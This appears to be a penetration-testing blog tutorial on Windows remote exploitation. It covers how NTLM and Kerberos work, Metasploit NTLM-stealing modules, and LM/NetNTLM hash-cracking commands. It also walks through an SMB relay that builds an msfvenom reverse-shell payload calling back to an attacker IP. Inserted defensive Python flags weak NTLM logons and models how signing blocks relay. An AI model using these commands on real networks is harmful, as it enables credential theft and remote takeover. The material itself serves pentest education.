Windows Remote Exploitation
Introduction
In this blog post, we will learn Windows remote exploitation techniques and approaches for engaging a target. We will also look at examples and the usage of tools.
Some of these approaches have already been discussed in the Linux exploitation modules.
Low Hanging Fruits
We discussed the low hanging fruit approaches in the Linux Exploitation module; the approach is the same for Windows, so please have a look at that blog post.
Remote Exploitation of Windows Network
The exploitation process in which an attacker exploits listening services on the target network and tries to gain access to the target system.
Windows Authentication
Windows uses two authentication protocols for client and server authentication: NTLM and Kerberos.
NTLM
NTLM (New Technology LAN Manager) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems.
How NTLM Works?
1. A user accesses a client computer and provides a domain name, user name, and password. The client computes a cryptographic hash of the password and discards the actual password.
2. The client sends the user name to the server to authenticate itself.
3. The server generates a 16-byte random number, called a challenge or nonce, and sends it to the requesting client.
4. The client encrypts this challenge with the hash of the user's password and sends the result (the response) to the server.
5. The server sends the user name, the challenge it sent to the client, and the response received from the client to the domain controller (the authentication server).
6. The domain controller uses the user name to retrieve the hash of the user's password from the SAM (Security Account Manager) database. It uses this password hash to encrypt the challenge.
7. The DC compares the encrypted challenge it computed (in step 6) to the response computed by the client (in step 4). If they are identical, authentication is successful for the client system.
Kerberos
Windows domains use Kerberos as the underlying protocol for SSO. A user can log on to the domain at the beginning of the workday, and the system uses the same credentials to access any resource in the domain. Kerberos is also used by Unix systems nowadays.
How Kerberos Works?
1. A user on a client computer sends an authentication request to the Kerberos server, including the user's login ID.
2. The authentication server replies with an encrypted symmetric key and a time-stamped ticket-granting ticket (TGT).
3. The client then sends a network authentication request including the TGT and the name of the target server, for example, MS Active Directory.
4. The Kerberos server replies with a session ticket for use with the target server.
5. The client presents the time-stamped session ticket to the target server as its authentication.
6. Finally, the target server provides authentication back to the client.
Authentication Successful!!
Also have a look at Windows Security Identifiers (SIDs); they are important.
Some NTLM Stealing Metasploit Modules
- MSSQL NTLM Stealer: auxiliary/admin/mssql/mssql_ntlm_stealer
- Oracle SMB Relay Code Execution: auxiliary/admin/oracle/ora_ntlm_stealer
- Host Information Enumeration via NTLM Authentication: auxiliary/scanner/http/ntlm_info_enumeration
- SMTP NTLM Domain Extraction: auxiliary/scanner/smtp/smtp_ntlm_domain
- WinRM Login Utility (this module attempts to authenticate to a WinRM service): auxiliary/scanner/winrm/winrm_login
To crack NTLM hashes
There are many techniques to crack captured NTLM hashes. With John the Ripper:
john --format=netlm hashpwd_netntlm
Using Rainbow Tables To Crack Hashes
Download rainbow tables from:
- http://project-rainbowcrack.com/table.htm
- http://ophcrack.sourceforge.net/tables.php
rcracki_mt -h 1f548398f0f49ea1 -t 4 *.rti
- -h: the first 8 bytes of the LM hash, in hex
- -t: the number of threads to use
- *.rti: the path to the downloaded rainbow tables
If you recover only half of the password:
In /usr/share/metasploit-framework/tools/password there is a script, halflm_second.rb, that can be used to recover the second half.
ruby halflm_second.rb -n 1f548398f0f49ea18e2f0dcb9562b75eaa32e75aebf1d69c -p HALFPSWD
To convert the result into the case-sensitive password:
perl netntlm.pl -file /root/hashpwd_netntlm -seed FULLHALFPSWD
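The half-LM cracking chain above only works when clients still answer with LM or NTLMv1 responses. As an added defender-side check (not part of the original post), the following Python parses constructed Security event 4624/4625 records, flattened here to one pipe-delimited line per event but using the real 4624 field names, and flags successful logons whose "Package Name (NTLM only)" is LM or NTLM V1, so those clients can be moved to NTLMv2 via the LAN Manager authentication level policy before such responses are captured.

```python
# Constructed sample of Windows Security event 4624/4625 records (not real log data),
# flattened to one pipe-delimited line per event using the event's own field names.
SAMPLE_EVENTS = """
EventID: 4624 | Account Name: alice | Workstation Name: WS01 | Logon Type: 3 | Authentication Package: NTLM | Package Name (NTLM only): NTLM V1 | Key Length: 56
EventID: 4624 | Account Name: bob | Workstation Name: WS02 | Logon Type: 3 | Authentication Package: NTLM | Package Name (NTLM only): NTLM V2 | Key Length: 128
EventID: 4624 | Account Name: svc_backup | Workstation Name: FS01 | Logon Type: 3 | Authentication Package: NTLM | Package Name (NTLM only): LM | Key Length: 56
EventID: 4624 | Account Name: carol | Workstation Name: WS03 | Logon Type: 2 | Authentication Package: Kerberos | Package Name (NTLM only): - | Key Length: 0
EventID: 4625 | Account Name: alice | Workstation Name: WS01 | Logon Type: 3 | Authentication Package: NTLM | Package Name (NTLM only): NTLM V1 | Key Length: 56
"""

# Response types that the LM/half-LM rainbow-table chain described above can attack.
WEAK_PACKAGES = {"LM", "NTLM V1"}

def parse_records(text):
    """Turn each non-empty line into a dict of field name -> value."""
    return [dict(part.split(": ", 1) for part in line.split(" | "))
            for line in text.strip().splitlines()]

def find_weak_ntlm_logons(text):
    """(account, workstation, package) for successful logons that used LM or NTLMv1."""
    hits = []
    for rec in parse_records(text):
        if rec["EventID"] != "4624" or rec["Authentication Package"] != "NTLM":
            continue  # failed logons and Kerberos logons are not what we are hunting
        package = rec["Package Name (NTLM only)"]
        if package in WEAK_PACKAGES:
            hits.append((rec["Account Name"], rec["Workstation Name"], package))
    return hits

def summarize_packages(text):
    """Count successful logons per authentication package / NTLM version."""
    counts = {}
    for rec in parse_records(text):
        if rec["EventID"] != "4624":
            continue
        label = rec["Authentication Package"]
        if label == "NTLM":
            label = rec["Package Name (NTLM only)"]  # LM, NTLM V1 or NTLM V2
        counts[label] = counts.get(label, 0) + 1
    return counts

if __name__ == "__main__":
    for account, host, package in find_weak_ntlm_logons(SAMPLE_EVENTS):
        print(f"weak NTLM logon: {account} from {host} used {package}")
    print(summarize_packages(SAMPLE_EVENTS))
```

Real 4624 events come out of EVTX/XML rather than this flattened form, so only `parse_records` needs replacing to run the same check over exported logs.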
SMBRelay Attack
It is a kind of Man-in-the-Middle attack in which the attacker relays SMB authentication requests to another host, gaining access to an authenticated SMB session if successful.
Metasploit module for this purpose:
msfconsole
use exploit/windows/smb/smb_relay
msf5 exploit(windows/smb/smb_relay) > info
Read about this module with the info command in Metasploit.
You can also use Impacket’s smbrelayx.py for this purpose.
smbrelayx.py: Exploit for CVE-2015-0005 using an SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON.
Using msfvenom, create a Windows reverse TCP .exe payload to use with smbrelayx.py:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<Port> -f exe -o hacker.exe
Start a Metasploit multi/handler on the attacker machine:
use exploit/multi/handler
Set the handler options, then run smbrelayx.py:
smbrelayx.py -h <TargetIP> -e /home/hacker.exe
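The NTLM challenge/response flow described earlier and the SMB relay it enables can be modelled end to end. This is an added Python simulation, not code from the post, Metasploit or Impacket, in which toy HMAC-SHA256 stand-ins replace the real MD4/DES/HMAC-MD5 primitives (an assumption; only the shape of the exchange is faithful). It shows why a client that answers any challenge it is shown can be relayed when signing is off, and why the relay fails once the server requires requests signed with the session key, which is derived from the password hash the relay never sees, the same condition smbrelayx.py notes for signing-enforced targets.

```python
import hashlib, hmac, os
# Toy stand-ins (assumptions): real NTLM hashes are MD4(UTF-16LE password) and real
# responses/session keys use DES (v1) or HMAC-MD5 (v2); the exchange shape is the point.
def nt_hash(password):
    return hashlib.sha256(password.encode("utf-16-le")).digest()
def response_for(pw_hash, challenge):
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()
def session_key(pw_hash, response):  # derived from the hash, never sent on the wire
    return hmac.new(pw_hash, b"session" + response, hashlib.sha256).digest()
def sign(key, msg):
    return hmac.new(key, msg, hashlib.sha256).digest()
def dc_verify(dc_hashes, user, challenge, response):
    # Steps 6-7 of the NTLM flow: recompute the response from the stored hash and compare.
    h = dc_hashes.get(user)
    if h is None or not hmac.compare_digest(response_for(h, challenge), response):
        return None
    return session_key(h, response)  # handed to the member server, not to the client

class Client:
    def __init__(self, user, password):
        self.user, self.pw_hash, self.key = user, nt_hash(password), None
    def answer(self, challenge):  # answers any challenge it is shown: what a relay exploits
        response = response_for(self.pw_hash, challenge)
        self.key = session_key(self.pw_hash, response)
        return self.user, response

class Server:
    def __init__(self, dc_hashes, require_signing):
        self.dc, self.require_signing, self.sessions = dc_hashes, require_signing, {}
    def challenge(self):
        return os.urandom(8)
    def authenticate(self, challenge, user, response):
        key = dc_verify(self.dc, user, challenge, response)
        if key is not None:
            self.sessions[response.hex()] = key  # response doubles as the session id here
        return response.hex() if key is not None else None
    def execute(self, sid, msg, sig=None):
        key = self.sessions.get(sid)
        if key is None:
            return "denied: not authenticated"
        if self.require_signing and (sig is None or not hmac.compare_digest(sign(key, msg), sig)):
            return "denied: unsigned or badly signed request"
        return "ok"

def relay_attempt(victim, target):
    # Attacker forwards the target's challenge to the victim and the victim's answer back.
    chal = target.challenge()
    user, response = victim.answer(chal)
    sid = target.authenticate(chal, user, response)
    return target.execute(sid, b"write file")  # relay holds no session key, so it cannot sign
```

Because the DC hands the session key only to the member server and the client derives its own copy from its hash, a legitimate client can sign requests while the relay cannot.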
To check for and use exploits for other Windows vulnerabilities,
run the command below in msfconsole:
show exploits windows
Conclusion
We have discussed basic exploitation of Windows systems, and we had already discussed some approaches in previous phases; exploitation depends entirely on the earlier phases of the pentest.